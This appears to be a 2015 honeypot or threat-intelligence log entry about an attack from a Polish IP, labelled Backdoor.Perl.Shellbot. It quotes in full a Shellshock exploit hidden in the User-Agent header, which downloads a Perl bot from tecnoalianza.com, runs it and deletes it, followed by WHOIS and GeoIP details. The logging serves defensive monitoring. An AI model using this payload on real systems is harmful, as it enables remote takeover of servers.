Samstag, 31. Oktober 2015

193.107.88.186 - Backdoor.Perl.Shellbot.jf via tecnoalianza.com

BEGIN OF HTTP DATA:
2015-10-31 01:14:48
Source IP: 193.107.88.186
Country: PL RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://tecnoalianza.com/a.log -O /tmp/a.log;curl -O /tmp/a.log http://tecnoalianza.com/a.log;perl /tmp/a.log;rm -rf /tmp/a.log*");'
Host: 195.169.125.87
Connection: Close

Domain Name: TECNOALIANZA.COM (66.240.252[.]12)
Registry Domain ID: 137741512_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.tucows.com
Registrar URL: http://tucowsdomains.com
Updated Date: 2014-12-18T11:44:43Z

193.107.88[.]186

    Static Source: GeoIP data
  • Country: Poland
  • ASN: AS48505 Kylos sp. z o.o.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/193.107.88.186

Feed search for 193.107.88[.]186

66.240.252[.]12

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS10439 CariNet, Inc.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/66.240.252.12

Feed search for 66.240.252[.]12